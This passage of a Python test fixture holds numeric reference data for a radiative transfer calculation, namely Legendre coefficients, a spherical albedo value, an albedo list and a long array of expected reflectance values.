0.9204422e00,
0.8914999e00,
0.8718511e00,
0.8442892e00,
0.8256361e00,
0.7993970e00,
0.7816934e00,
0.7567216e00,
0.7399231e00,
0.7161648e00,
0.7002287e00,
0.6776319e00,
0.6625175e00,
0.6410319e00,
0.6267001e00,
0.6062772e00,
0.5926905e00,
0.5732835e00,
0.5604061e00,
0.5419698e00,
0.5297674e00,
0.5122584e00,
0.5006981e00,
0.4840745e00,
0.4731249e00,
0.4573463e00,
0.4469774e00,
0.4320051e00,
0.4221882e00,
0.4079849e00,
0.3986924e00,
0.3852225e00,
0.3764283e00,
0.3636572e00,
0.3553362e00,
0.3432310e00,
0.3353594e00,
0.3238883e00,
0.3164434e00,
0.3055761e00,
0.2985361e00,
0.2882435e00,
0.2815877e00,
0.2718419e00,
0.2655505e00,
0.2563248e00,
0.2503791e00,
0.2416479e00,
0.2360299e00,
0.2277687e00,
0.2224615e00,
0.2146470e00,
0.2096341e00,
0.2022440e00,
0.1975101e00,
0.1905229e00,
0.1860533e00,
0.1794487e00,
0.1752294e00,
0.1689879e00,
0.1650056e00,
0.1591086e00,
0.1553506e00,
0.1497804e00,
0.1462348e00,
0.1409744e00,
0.1376297e00,
0.1326632e00,
0.1295086e00,
0.1248204e00,
0.1218456e00,
0.1174212e00,
0.1146165e00,
0.1104419e00,
0.1077980e00,
0.1038600e00,
0.1013680e00,
0.9765404e-01,
0.9530568e-01,
0.9180371e-01,
0.8959107e-01,
0.8628968e-01,
0.8420526e-01,
0.8109362e-01,
0.7913032e-01,
0.7619812e-01,
0.7434919e-01,
0.7158666e-01,
0.6984571e-01,
0.6724356e-01,
0.6560456e-01,
0.6315396e-01,
0.6161117e-01,
0.5930377e-01,
0.5785177e-01,
0.5567961e-01,
0.5431328e-01,
0.5226885e-01,
0.5098332e-01,
0.4905947e-01,
0.4785016e-01,
0.4604013e-01,
0.4490269e-01,
0.4320006e-01,
0.4213037e-01,
0.4052908e-01,
0.3952327e-01,
0.3801755e-01,
0.3707194e-01,
0.3565637e-01,
0.3476748e-01,
0.3343689e-01,
0.3260145e-01,
0.3135097e-01,
0.3056588e-01,
0.2939089e-01,
0.2865322e-01,
0.2754936e-01,
0.2685635e-01,
0.2581950e-01,
0.2516853e-01,
0.2419479e-01,
0.2358340e-01,
0.2266910e-01,
0.2209496e-01,
0.2123660e-01,
0.2069752e-01,
0.1989183e-01,
0.1938574e-01,
0.1862960e-01,
0.1815454e-01,
0.1744504e-01,
0.1699918e-01,
0.1633353e-01,
0.1591513e-01,
0.1529073e-01,
0.1489815e-01,
0.1431255e-01,
0.1394424e-01,
0.1339511e-01,
0.1304962e-01,
0.1253477e-01,
0.1221073e-01,
0.1172810e-01,
0.1142421e-01,
0.1097185e-01,
0.1068691e-01,
0.1026299e-01,
0.9995839e-02,
0.9598632e-02,
0.9348197e-02,
0.8976075e-02,
0.8741341e-02,
0.8392774e-02,
0.8172784e-02,
0.7846332e-02,
0.7640186e-02,
0.7334491e-02,
0.7141344e-02,
0.6855129e-02,
0.6674184e-02,
0.6406246e-02,
0.6236754e-02,
0.5985964e-02,
0.5827218e-02,
0.5592512e-02,
0.5443850e-02,
0.5224227e-02,
0.5085025e-02,
0.4879544e-02,
0.4749216e-02,
0.4556995e-02,
0.4434989e-02,
0.4255197e-02,
0.4140997e-02,
0.3972854e-02,
0.3865974e-02,
0.3708747e-02,
0.3608730e-02,
0.3461733e-02,
0.3368151e-02,
0.3230736e-02,
0.3143185e-02,
0.3014746e-02,
0.2932847e-02,
0.2812813e-02,
0.2736210e-02,
0.2624045e-02,
0.2552404e-02,
0.2447605e-02,
0.2380611e-02,
0.2282708e-02,
0.2220067e-02,
0.2128618e-02,
0.2070056e-02,
0.1984648e-02,
0.1929906e-02,
0.1850152e-02,
0.1798987e-02,
0.1724522e-02,
0.1676708e-02,
0.1607190e-02,
0.1562511e-02,
0.1497620e-02,
0.1455875e-02,
0.1395308e-02,
0.1356308e-02,
0.1299785e-02,
0.1263353e-02,
0.1210611e-02,
0.1176583e-02,
0.1127375e-02,
0.1095598e-02,
0.1049696e-02,
0.1020025e-02,
0.9772121e-03,
0.9495118e-03,
0.9095846e-03,
0.8837259e-03,
0.8464937e-03,
0.8223557e-03,
0.7876397e-03,
0.7651098e-03,
0.7327438e-03,
0.7117181e-03,
0.6815480e-03,
0.6619300e-03,
0.6338120e-03,
0.6155113e-03,
0.5893102e-03,
0.5722408e-03,
0.5478283e-03,
0.5319081e-03,
0.5091634e-03,
0.4943152e-03,
0.4731258e-03,
0.4592787e-03,
0.4395410e-03,
0.4266303e-03,
0.4082493e-03,
0.3962155e-03,
0.3791019e-03,
0.3678880e-03,
0.3519565e-03,
0.3415071e-03,
0.3266762e-03,
0.3169383e-03,
0.3031319e-03,
0.2940574e-03,
0.2812067e-03,
0.2727531e-03,
0.2607960e-03,
0.2529247e-03,
0.2418025e-03,
0.2344753e-03,
0.2241307e-03,
0.2173091e-03,
0.2076865e-03,
0.2013343e-03,
0.1923831e-03,
0.1864691e-03,
0.1781456e-03,
0.1726433e-03,
0.1649075e-03,
0.1597912e-03,
0.1526032e-03,
0.1478454e-03,
0.1411648e-03,
0.1367381e-03,
0.1305278e-03,
0.1264096e-03,
0.1206392e-03,
0.1168121e-03,
0.1114548e-03,
0.1079011e-03,
0.1029286e-03,
0.9962750e-04,
0.9500928e-04,
0.9194008e-04,
0.8765030e-04,
0.8479853e-04,
0.8081775e-04,
0.7817267e-04,
0.7448255e-04,
0.7203030e-04,
0.6860758e-04,
0.6633051e-04,
0.6315326e-04,
0.6103854e-04,
0.5809158e-04,
0.5613237e-04,
0.5340456e-04,
0.5159216e-04,
0.4906537e-04,
0.4738409e-04,
0.4504024e-04,
0.4348066e-04,
0.4130949e-04,
0.3986734e-04,
0.3786116e-04,
0.3653038e-04,
0.3467413e-04,
0.3343939e-04,
0.3171734e-04,
0.3057505e-04,
0.2898660e-04,
0.2793625e-04,
0.2646920e-04,
0.2549635e-04,
0.2413735e-04,
0.2323900e-04,
0.2198645e-04,
0.2116049e-04,
0.2000504e-04,
0.1924253e-04,
0.1817554e-04,
0.1747326e-04,
0.1649066e-04,
0.1584529e-04,
0.1494019e-04,
0.1434660e-04,
0.1351308e-04,
0.1296814e-04,
0.1220153e-04,
0.1170191e-04,
0.1099720e-04,
0.1053953e-04,
0.9892289e-05,
]
return (
ssalb,
len(Legendre_coef),
np.pad(Legendre_coef, (0, 700 - len(Legendre_coef))),
)
def results():
spherical_albedo = 0.1400516239529828
albedo = [
0.57934552e00,
0.55945677e00,
0.53431237e00,
0.50788230e00,
0.48296762e00,
0.46127653e00,
0.44329438e00,
0.42849159e00,
0.41589457e00,
0.40462923e00,
0.39412692e00,
0.38407087e00,
0.37428829e00,
0.36468229e00,
0.35519615e00,
0.34579977e00,
0.33647874e00,
0.32722980e00,
0.31805637e00,
0.30896705e00,
0.29997292e00,
0.29108667e00,
0.28232241e00,
0.27369434e00,
0.26521713e00,
0.25690463e00,
0.24876949e00,
0.24082196e00,
0.23306957e00,
0.22551830e00,
0.21817389e00,
0.21104220e00,
0.20412904e00,
0.19744009e00,
0.19098036e00,
0.18475346e00,
0.17876221e00,
0.17300782e00,
0.16749054e00,
0.16220950e00,
0.15716265e00,
0.15234718e00,
0.14775957e00,
0.14339539e00,
0.13924994e00,
0.13531761e00,
0.13159263e00,
0.12806895e00,
0.12473993e00,
0.12159910e00,
0.11863959e00,
0.11585440e00,
0.11323670e00,
0.11077949e00,
0.10847593e00,
0.10631904e00,
0.10430222e00,
0.10241879e00,
0.10066233e00,
0.99026598e-01,
0.97505502e-01,
0.96093059e-01,
0.94783649e-01,
0.93571737e-01,
0.92452131e-01,
0.91419615e-01,
0.90469383e-01,
0.89596771e-01,
0.88797286e-01,
0.88066630e-01,
0.87400697e-01,
0.86795583e-01,
0.86247541e-01,
0.85752994e-01,
0.85308485e-01,
0.84910698e-01,
0.84556349e-01,
0.84242381e-01,
0.83965667e-01,
0.83723314e-01,
0.83512425e-01,
0.83330259e-01,
0.83174184e-01,
0.83041623e-01,
0.82930155e-01,
0.82837544e-01,
0.82761563e-01,
0.82700156e-01,
0.82651392e-01,
0.82613394e-01,
0.82584500e-01,
0.82563184e-01,
0.82548007e-01,
0.82537644e-01,
0.82530975e-01,
0.82526997e-01,
0.82524881e-01,
0.82523920e-01,
0.82523584e-01,
0.82523517e-01,
]
expected_r1 = np.array(
[
0.38368369e03,
0.25770578e03,
0.23945151e03,
0.16855780e03,
0.18244296e03,
0.16236093e03,
0.10911653e03,
0.12755070e03,
0.12647316e03,
0.10830920e03,
0.67582947e02,
0.83225288e02,
0.89081558e02,
0.82212189e02,
0.66570000e02,
0.39153576e02,
0.50326321e02,
0.57166462e02,
0.56031170e02,
0.47971886e02,
0.36434990e02,
0.21253523e02,
0.28237167e02,
0.33642113e02,
0.34688950e02,
0.31254200e02,
0.25037840e02,
0.18253815e02,
0.11248275e02,
0.15133494e02,
0.18625698e02,
0.20033745e02,
0.18957489e02,
0.16075739e02,
0.12519300e02,
0.92340946e01,
0.62269855e01,
0.82350597e01,
0.10240828e02,
0.11357998e02,
0.11247568e02,
0.10105079e02,
0.84183950e01,
0.66705170e01,
0.51578894e01,
0.37987945e01,
0.48435707e01,
0.59637489e01,
0.67243404e01,
0.69045143e01,
0.65221829e01,
0.57613211e01,
0.48524532e01,
0.39752564e01,
0.32225568e01,
0.25505664e01,
0.31431477e01,
0.38052323e01,
0.43142323e01,
0.45352106e01,
0.44408669e01,
0.40962334e01,
0.36127684e01,
0.30965683e01,
0.26170671e01,
0.22043598e01,
0.18349921e01,
0.22099471e01,
0.26385496e01,
0.29933913e01,
0.31896119e01,
0.31966636e01,
0.30375271e01,
0.27696035e01,
0.24563296e01,
0.21455364e01,
0.18630074e01,
0.16174023e01,
0.13863298e01,
0.16447055e01,
0.19445310e01,
0.22046304e01,
0.23685496e01,
0.24110959e01,
0.23400669e01,
0.21870027e01,
0.19907905e01,
0.17838671e01,
0.15866874e01,
0.14085795e01,
0.12514458e01,
0.10881330e01,
0.12770401e01,
0.14988452e01,
0.16977799e01,
0.18342333e01,
0.18884524e01,
0.18623250e01,
0.17742110e01,
0.16486713e01,
0.15075257e01,
0.13662242e01,
0.12339157e01,
0.11142954e01,
0.10071722e01,
0.88128895e00,
0.10257436e01,
0.11969687e01,
0.13544649e01,
0.14691297e01,
0.15254281e01,
0.15228883e01,
0.14728941e01,
0.13916924e01,
0.12941229e01,
0.11911522e01,
0.10903227e01,
0.99648142e00,
0.91146982e00,
0.83437926e00,
0.73236907e00,
0.84691751e00,
0.98372436e00,
0.11120189e01,
0.12095475e01,
0.12638915e01,
0.12736813e01,
0.12464422e01,
0.11935405e01,
0.11255139e01,
0.10501394e01,
0.97279239e00,
0.89753741e00,
0.82755452e00,
0.76412642e00,
0.70607662e00,
0.62143141e00,
0.71498531e00,
0.82739562e00,
0.93439400e00,
0.10183749e01,
0.10692183e01,
0.10852710e01,
0.10717980e01,
0.10371528e01,
0.98918498e00,
0.93369889e00,
0.87458736e00,
0.81457925e00,
0.75610143e00,
0.70160747e00,
0.65229672e00,
0.60690910e00,
0.53620493e00,
0.61444676e00,
0.70891893e00,
0.79989344e00,
0.87304217e00,
0.91996312e00,
0.93897974e00,
0.93395931e00,
0.91129071e00,
0.87703383e00,
0.83570266e00,
0.79033947e00,
0.74295175e00,
0.69498348e00,
0.64796978e00,
0.60397410e00,
0.56429613e00,
0.52768981e00,
0.46893141e00,
0.53562319e00,
0.61647099e00,
0.69504291e00,
0.75940472e00,
0.80246264e00,
0.82262319e00,
0.82284969e00,
0.80819505e00,
0.78347129e00,
0.75227189e00,
0.71705294e00,
0.67947024e00,
0.64061898e00,
0.60127056e00,
0.56240505e00,
0.52581406e00,
0.49295956e00,
0.46267310e00,
0.41456842e00,
0.47228998e00,
0.54249328e00,
0.61122215e00,
0.66834646e00,
0.70778871e00,
0.72807664e00,
0.73156416e00,
0.72236371e00,
0.70439237e00,
0.68056595e00,
0.65288788e00,
0.62274611e00,
0.59110469e00,
0.55858999e00,
0.52560019e00,
0.49273926e00,
0.46156633e00,
0.43370983e00,
0.40812615e00,
0.36973703e00,
0.42031151e00,
0.48198968e00,
0.54273206e00,
0.59380746e00,
0.62994283e00,
0.64979416e00,
0.65528655e00,
0.64984703e00,
0.63673460e00,
0.61836016e00,
0.59637630e00,
0.57194269e00,
0.54589856e00,
0.51883745e00,
0.49112943e00,
0.46296096e00,
0.43467191e00,
0.40760121e00,
0.38351870e00,
0.36154264e00,
0.33207551e00,
0.37681752e00,
0.43150941e00,
0.48563948e00,
0.53159100e00,
0.56474036e00,
0.58386314e00,
0.59056675e00,
0.58775848e00,
0.57819819e00,
0.56391406e00,
0.54628950e00,
0.52629930e00,
0.50466305e00,
0.48191690e00,
0.45844156e00,
0.43446112e00,
0.41004205e00,
0.38533735e00,
0.36147287e00,
0.34032100e00,
0.32119045e00,
0.29983068e00,
0.33969635e00,
0.38853076e00,
0.43707687e00,
0.47863159e00,
0.50910699e00,
0.52738410e00,
0.53481984e00,
0.53390729e00,
0.52700996e00,
0.51585591e00,
0.50161958e00,
0.48513207e00,
0.46701470e00,
0.44774175e00,
0.42767024e00,
0.40705225e00,
0.38602614e00,
0.36459178e00,
0.34277132e00,
0.32148623e00,
0.30266759e00,
0.28583673e00,
0.27165741e00,
0.30735224e00,
0.35116890e00,
0.39490715e00,
0.43263298e00,
0.46071306e00,
0.47812337e00,
0.48601636e00,
0.48654056e00,
0.48172772e00,
0.47305444e00,
0.46152285e00,
0.44784895e00,
0.43257853e00,
0.41613755e00,
0.39885530e00,
0.38097894e00,
0.36268044e00,
0.34404564e00,
0.32503796e00,
0.30558982e00,
0.28643203e00,
0.26951250e00,
0.25458133e00,
0.24664548e00,
0.27872956e00,
0.31819224e00,
0.35773003e00,
0.39206341e00,
0.41795400e00,
0.43447414e00,
0.44261932e00,
0.44425684e00,
0.44113833e00,
0.43451858e00,
0.42523941e00,
0.41390744e00,
0.40100044e00,
0.38690761e00,
0.37194157e00,
0.35634446e00,
0.34029481e00,
0.32391262e00,
0.30725011e00,
0.29025167e00,
0.27279079e00,
0.25542563e00,
0.24008393e00,
0.22675417e00,
0.22445151e00,
0.25343820e00,
0.28914347e00,
0.32500827e00,
0.35629919e00,
0.38011837e00,
0.39564186e00,
0.40376574e00,
0.40615430e00,
0.40434766e00,
0.39941984e00,
0.39206272e00,
0.38276103e00,
0.37190381e00,
0.35982931e00,
0.34683278e00,
0.33315977e00,
0.31900054e00,
0.30449098e00,
0.28971705e00,
0.27470860e00,
0.25940111e00,
0.24363182e00,
0.22780687e00,
0.21380231e00,
0.20184751e00,
0.20519748e00,
0.23159876e00,
0.26413625e00,
0.29684672e00,
0.32543322e00,
0.34727564e00,
0.36164755e00,
0.36939174e00,
0.37204832e00,
0.37103242e00,
0.36731219e00,
0.36147776e00,
0.35390341e00,
0.34486532e00,
0.33460709e00,
0.32336712e00,
0.31137651e00,
0.29884037e00,
0.28591970e00,
0.27272525e00,
0.25932097e00,
0.24572186e00,
0.23185994e00,
0.21755250e00,
0.20307408e00,
0.19022347e00,
0.17946769e00,
0.18898228e00,
0.21327148e00,
0.24319792e00,
0.27327064e00,
0.29953399e00,
0.31957966e00,
0.33274972e00,
0.33984205e00,
0.34230980e00,
0.34150216e00,
0.33835727e00,
0.33344826e00,
0.32711285e00,
0.31955174e00,
0.31089956e00,
0.30128181e00,
0.29084933e00,
0.27977982e00,
0.26825124e00,
0.25640994e00,
0.24435396e00,
0.23213391e00,
0.21975470e00,
0.20714773e00,
0.19412118e00,
0.18083785e00,
0.16899987e00,
0.15930425e00,
0.17541476e00,
0.19795303e00,
0.22571321e00,
0.25359881e00,
0.27793473e00,
0.29647639e00,
0.30860057e00,
0.31503823e00,
0.31714112e00,
0.31618607e00,
0.31309542e00,
0.30847403e00,
0.30271024e00,
0.29603517e00,
0.28855911e00,
0.28031746e00,
0.27133235e00,
0.26166755e00,
0.25144571e00,
0.24082130e00,
0.22993420e00,
0.21887848e00,
0.20769787e00,
0.19639082e00,
0.18488961e00,
0.17300032e00,
0.16079190e00,
0.14985578e00,
0.14110740e00,
0.16366631e00,
0.18467116e00,
0.21054901e00,
0.23656210e00,
0.25929046e00,
0.27663431e00,
0.28799024e00,
0.29400581e00,
0.29590416e00,
0.29484844e00,
0.29169577e00,
0.28704572e00,
0.28133944e00,
0.27490255e00,
0.26794240e00,
0.26054066e00,
0.25267535e00,
0.24428359e00,
0.23534042e00,
0.22590491e00,
0.21610361e00,
0.20607288e00,
0.19590905e00,
0.18565454e00,
0.17530420e00,
0.16479163e00,
0.15392394e00,
0.14269111e00,
0.13256522e00,
0.12466694e00,
0.15291582e00,
0.17249423e00,
0.19663572e00,
0.22094680e00,
0.24225558e00,
0.25860691e00,
0.26942277e00,
0.27527362e00,
0.27725279e00,
0.27639005e00,
0.27343193e00,
0.26890206e00,
0.26321408e00,
0.25673062e00,
0.24976483e00,
0.24254556e00,
0.23517576e00,
0.22762197e00,
0.21976374e00,
0.21149129e00,
0.20278960e00,
0.19374785e00,
0.18449736e00,
0.17514092e00,
0.16572388e00,
0.15623912e00,
0.14661992e00,
0.13667518e00,
0.12632957e00,
0.11693286e00,
0.10979707e00,
0.14267196e00,
0.16087982e00,
0.18335804e00,
0.20604582e00,
0.22601375e00,
0.24145372e00,
0.25182438e00,
0.25763780e00,
0.25987828e00,
0.25945812e00,
0.25701439e00,
0.25296855e00,
0.24764267e00,
0.24133593e00,
0.23435625e00,
0.22701317e00,
0.21957387e00,
0.21219650e00,
0.20488037e00,
0.19748402e00,
0.18982655e00,
0.18181197e00,
0.17347980e00,
0.16495080e00,
0.15633532e00,
0.14768384e00,
0.13898759e00,
0.13017787e00,
0.12106603e00,
0.11152479e00,
0.10278418e00,
0.96333064e-01,
0.13278867e00,
0.14967601e00,
0.17054874e00,
0.19166234e00,
0.21031891e00,
0.22485405e00,
0.23476954e00,
0.24053511e00,
0.24305005e00,
0.24313784e00,
0.24135487e00,
0.23804264e00,
0.23343392e00,
0.22772875e00,
0.22114034e00,
0.21392128e00,
0.20636588e00,
0.19877388e00,
0.19137226e00,
0.18422794e00,
0.17721902e00,
0.17011781e00,
0.16274700e00,
0.15508358e00,
0.14722840e00,
0.13929746e00,
0.13134745e00,
0.12336826e00,
0.11528943e00,
0.10692697e00,
0.98114364e-01,
0.89966424e-01,
0.84133029e-01,
0.12330588e00,
0.13893479e00,
0.15827183e00,
0.17786814e00,
0.19524175e00,
0.20886324e00,
0.21827731e00,
0.22391967e00,
0.22662000e00,
0.22713451e00,
0.22596700e00,
0.22341314e00,
0.21965274e00,
0.21481460e00,
0.20901735e00,
0.20240258e00,
0.19516377e00,
0.18756257e00,
0.17991112e00,
0.17249928e00,
0.16548070e00,
0.15879016e00,
0.15218471e00,
0.14541364e00,
0.13838096e00,
0.13115591e00,
0.12385615e00,
0.11654575e00,
0.10921578e00,
0.10179584e00,
0.94108447e-01,
0.85958004e-01,
0.78349575e-01,
0.73076993e-01,
0.11430455e00,
0.12874915e00,
0.14663576e00,
0.16478880e00,
0.18092515e00,
0.19363941e00,
0.20251557e00,
0.20795847e00,
0.21073578e00,
0.21154700e00,
0.21085797e00,
0.20893978e00,
0.20595059e00,
0.20198931e00,
0.19712524e00,
0.19142093e00,
0.18495877e00,
0.17787308e00,
0.17037868e00,
0.16277534e00,
0.15539503e00,
0.14847951e00,
0.14204761e00,
0.13587566e00,
0.12965593e00,
0.12321350e00,
0.11657458e00,
0.10985404e00,
0.10312499e00,
0.96382633e-01,
0.89558579e-01,
0.82482606e-01,
0.74937083e-01,
0.67823343e-01,
0.63062489e-01,
0.10584079e00,
0.11918116e00,
0.13571160e00,
0.15250790e00,
0.16746905e00,
0.17930275e00,
0.18762796e00,
0.19281991e00,
0.19558841e00,
0.19658093e00,
0.19623034e00,
0.19479063e00,
0.19241145e00,
0.18918501e00,
0.18516850e00,
0.18039672e00,
0.17489515e00,
0.16870056e00,
0.16189243e00,
0.15463088e00,
0.14718156e00,
0.13989125e00,
0.13307634e00,
0.12685405e00,
0.12105249e00,
0.11533057e00,
0.10943508e00,
0.10333905e00,
0.97149357e-01,
0.90949543e-01,
0.84741533e-01,
0.78459755e-01,
0.71940817e-01,
0.64950287e-01,
0.58292422e-01,
0.53999700e-01,
0.97934157e-01,
0.11025076e00,
0.12552127e00,
0.14105226e00,
0.15490949e00,
0.16590366e00,
0.17368492e00,
0.17860012e00,
0.18130451e00,
0.18239634e00,
0.18227696e00,
0.18118428e00,
0.17926148e00,
0.17660023e00,
0.17325978e00,
0.16927499e00,
0.16466121e00,
0.15942113e00,
0.15355882e00,
0.14710733e00,
0.14017075e00,
0.13296603e00,
0.12582819e00,
0.11912578e00,
0.11307607e00,
0.10758535e00,
0.10230618e00,
0.96913703e-01,
0.91320075e-01,
0.85618503e-01,
0.79903029e-01,
0.74183889e-01,
0.68398476e-01,
0.62389236e-01,
0.55908926e-01,
0.49671900e-01,
0.45807466e-01,
0.90577021e-01,
0.10194721e00,
0.11605130e00,
0.13040775e00,
0.14323507e00,
0.15343815e00,
0.16069512e00,
0.16532598e00,
0.16793491e00,
0.16907367e00,
0.16911317e00,
0.16827461e00,
0.16669342e00,
0.16445951e00,
0.16163501e00,
0.15826119e00,
0.15436088e00,
0.14993919e00,
0.14498582e00,
0.13948333e00,
0.13342866e00,
0.12687427e00,
0.11998184e00,
0.11305442e00,
0.10648688e00,
0.10058656e00,
0.95354967e-01,
0.90465494e-01,
0.85533582e-01,
0.80405675e-01,
0.75155161e-01,
0.69885492e-01,
0.64615801e-01,
0.59286319e-01,
0.53744264e-01,
0.47732841e-01,
0.41884389e-01,
0.38411867e-01,
0.83746620e-01,
0.94243065e-01,
0.10726915e00,
0.12053798e00,
0.13240825e00,
0.14187106e00,
0.14862999e00,
0.15297991e00,
0.15547749e00,
0.15663114e00,
0.15678266e00,
0.15613645e00,
0.15481880e00,
0.15291539e00,
0.15048827e00,
0.14758278e00,
0.14422987e00,
0.14044581e00,
0.13623075e00,
0.13156785e00,
0.12642694e00,
0.12077967e00,
0.11463551e00,
0.10810074e00,
0.10143317e00,
0.95029272e-01,
0.89268476e-01,
0.84254339e-01,
0.79705626e-01,
0.75194120e-01,
0.70498869e-01,
0.65667070e-01,
0.60809318e-01,
0.55953730e-01,
0.51043399e-01,
0.45929730e-01,
0.40349029e-01,
0.34859274e-01,
0.31745121e-01,
0.77413671e-01,
0.87103941e-01,
0.99134557e-01,
0.11139757e00,
0.12238043e00,
0.13115339e00,
0.13744320e00,
0.14152151e00,
0.14390105e00,
0.14504991e00,
0.14528263e00,
0.14478727e00,
0.14368038e00,
0.14204189e00,
0.13993120e00,
0.13739403e00,
0.13446525e00,
0.13116941e00,
0.12751934e00,
0.12351336e00,
0.11913250e00,
0.11434042e00,
0.10909266e00,
0.10336579e00,
0.97215243e-01,
0.90846524e-01,
0.84636919e-01,
0.79015903e-01,
0.74187510e-01,
0.69935963e-01,
0.65807395e-01,
0.61514482e-01,
0.57072140e-01,
0.52595474e-01,
0.48121743e-01,
0.43596964e-01,
0.38876079e-01,
0.33690531e-01,
0.28531600e-01,
0.25744777e-01,
0.71547434e-01,
0.80494061e-01,
0.91605820e-01,
0.10293934e00,
0.11310040e00,
0.12123200e00,
0.12708212e00,
0.13090093e00,
0.13316067e00,
0.13429219e00,
0.13458471e00,
0.13421088e00,
0.13327757e00,
0.13185826e00,
0.13000821e00,
0.12777114e00,
0.12518245e00,
0.12227035e00,
0.11905541e00,
0.11554869e00,
0.11174847e00,
0.10763626e00,
0.10317403e00,
0.98308414e-01,
0.92992358e-01,
0.87237559e-01,
0.81194960e-01,
0.75207628e-01,
0.69733076e-01,
0.65067738e-01,
0.61075501e-01,
0.57294834e-01,
0.53375702e-01,
0.49295910e-01,
0.45172136e-01,
0.41050550e-01,
0.36880266e-01,
0.32519296e-01,
0.27695602e-01,
0.22840958e-01,
0.20352198e-01,
0.66117376e-01,
0.74378133e-01,
0.84641933e-01,
0.95116824e-01,
0.10451740e00,
0.11205351e00,
0.11749266e00,
0.12106522e00,
0.12320609e00,
0.12431186e00,
0.12464833e00,
0.12437376e00,
0.12358582e00,
0.12235164e00,
0.12072182e00,
0.11873700e00,
0.11643104e00,
0.11383259e00,
0.11096542e00,
0.10784754e00,
0.10448926e00,
0.10088971e00,
0.97032204e-01,
0.92879705e-01,
0.88374905e-01,
0.83454721e-01,
0.78095064e-01,
0.72394073e-01,
0.66651307e-01,
0.61332978e-01,
0.56815393e-01,
0.53050254e-01,
0.49585145e-01,
0.46012942e-01,
0.42270541e-01,
0.38473442e-01,
0.34676433e-01,
0.30831696e-01,
0.26799770e-01,
0.22306219e-01,
0.17730433e-01,
0.15513073e-01,
0.61093956e-01,
0.68722166e-01,
0.78203514e-01,
0.87885372e-01,
0.96582450e-01,
0.10356604e00,
0.10862161e00,
0.11196126e00,
0.11398555e00,
0.11505950e00,
0.11542739e00,
0.11523422e00,
0.11456916e00,
0.11349328e00,
0.11205266e00,
0.11028446e00,
0.10822011e00,
0.10588704e00,
0.10330941e00,
0.10050797e00,
0.97499035e-01,
0.94292536e-01,
0.90888672e-01,
0.87273069e-01,
0.83411098e-01,
0.79244599e-01,
0.74700132e-01,
0.69725469e-01,
0.64370766e-01,
0.58887802e-01,
0.53736102e-01,
0.49357101e-01,
0.45792568e-01,
0.42613342e-01,
0.39362472e-01,
0.35933696e-01,
0.32438610e-01,
0.28940061e-01,
0.25393331e-01,
0.21661280e-01,
0.17468622e-01,
0.13150477e-01,
0.11185951e-01,
0.56448560e-01,
0.63493401e-01,
0.72252735e-01,
0.81202179e-01,
0.89248493e-01,
0.95719531e-01,
0.10041723e00,
0.10353691e00,
0.10544755e00,
0.10648517e00,
0.10687432e00,
0.10674787e00,
0.10618718e00,
0.10524774e00,
0.10397130e00,
0.10239167e00,
0.10053762e00,
0.98434702e-01,
0.96106045e-01,
0.93572617e-01,
0.90852953e-01,
0.87962106e-01,
0.84909752e-01,
0.81697099e-01,
0.78312054e-01,
0.74722745e-01,
0.70871852e-01,
0.66679642e-01,
0.62072858e-01,
0.57060491e-01,
0.51846057e-01,
0.46870694e-01,
0.42625420e-01,
0.39239943e-01,
0.36319576e-01,
0.33365458e-01,
0.30227283e-01,
0.27010450e-01,
0.23785481e-01,
0.20511542e-01,
0.17054949e-01,
0.13141878e-01,
0.90698684e-02,
0.73469649e-02,
0.52153420e-01,
0.58660157e-01,
0.66753164e-01,
0.75026073e-01,
0.82470380e-01,
0.88465959e-01,
0.92829920e-01,
0.95742144e-01,
0.97542584e-01,
0.98540656e-01,
0.98942772e-01,
0.98870747e-01,
0.98398849e-01,
0.97577512e-01,
0.96444599e-01,
0.95030688e-01,
0.93361929e-01,
0.91461726e-01,
0.89351647e-01,
0.87051816e-01,
0.84580876e-01,
0.81955560e-01,
0.79189852e-01,
0.76293178e-01,
0.73267482e-01,
0.70102490e-01,
0.66768855e-01,
0.63210987e-01,
0.59346184e-01,
0.55086352e-01,
0.50406374e-01,
0.45463238e-01,
0.40671837e-01,
0.36558144e-01,
0.33334181e-01,
0.30647837e-01,
0.27966481e-01,
0.25096513e-01,
0.22136096e-01,
0.19164244e-01,
0.16145656e-01,
0.12950187e-01,
0.93025165e-02,
0.54607159e-02,
0.39474810e-02,
0.48182234e-01,
0.54192506e-01,
0.61670437e-01,
0.69318332e-01,
0.76205671e-01,
0.81760220e-01,
0.85813068e-01,
0.88529900e-01,
0.90223983e-01,
0.91180287e-01,
0.91588661e-01,
0.91560833e-01,
0.91164641e-01,
0.90445958e-01,
0.89439072e-01,
0.88171646e-01,
0.86667374e-01,
0.84947526e-01,
0.83031908e-01,
0.80939271e-01,
0.78687482e-01,
0.76293327e-01,
0.73772058e-01,
0.71136616e-01,
0.68396017e-01,
0.65552600e-01,
0.62597387e-01,
0.59503239e-01,
0.56216817e-01,
0.52654829e-01,
0.48719283e-01,
0.44357602e-01,
0.39683431e-01,
0.35080492e-01,
0.31097105e-01,
0.28020034e-01,
0.25545072e-01,
0.23114407e-01,
0.20494236e-01,
0.17775815e-01,
0.15046233e-01,
0.12272255e-01,
0.93193343e-02,
0.59020361e-02,
0.22407323e-02,
0.87492354e-03,
0.44510506e-01,
0.50062627e-01,
0.56972671e-01,
0.64043038e-01,
0.70415020e-01,
0.75560495e-01,
0.79323418e-01,
0.81856459e-01,
0.83448350e-01,
0.84361628e-01,
0.84770963e-01,
0.84778860e-01,
0.84447332e-01,
0.83818108e-01,
0.82922280e-01,
0.81784874e-01,
0.80427296e-01,
0.78868859e-01,
0.77127583e-01,
0.75220726e-01,
0.73164918e-01,
0.70976183e-01,
0.68669744e-01,
0.66259526e-01,
0.63757502e-01,
0.61172180e-01,
0.58505908e-01,
0.55750374e-01,
0.52880324e-01,
0.49845133e-01,
0.46562638e-01,
0.42928446e-01,
0.38867969e-01,
0.34455679e-01,
0.30041935e-01,
0.26187586e-01,
0.23246434e-01,
0.20965882e-01,
0.18771386e-01,
0.16391607e-01,
0.13906728e-01,
0.11403601e-01,
0.88423118e-02,
0.60800756e-02,
0.28280553e-02,
-0.70986536e-03,
-0.19648359e-02,
0.41115671e-01,
0.46244897e-01,
0.52630525e-01,
0.59167176e-01,
0.65062307e-01,
0.69828428e-01,
0.73321380e-01,
0.75681835e-01,
0.77175975e-01,
0.78045711e-01,
0.78451805e-01,
0.78488372e-01,
0.78212120e-01,
0.77661060e-01,
0.76863378e-01,
0.75841703e-01,
0.74615397e-01,
0.73201917e-01,
0.71617633e-01,
0.69878295e-01,
0.67999192e-01,
0.65995254e-01,
0.63880973e-01,
0.61670251e-01,
0.59375945e-01,
0.57009004e-01,
0.54577064e-01,
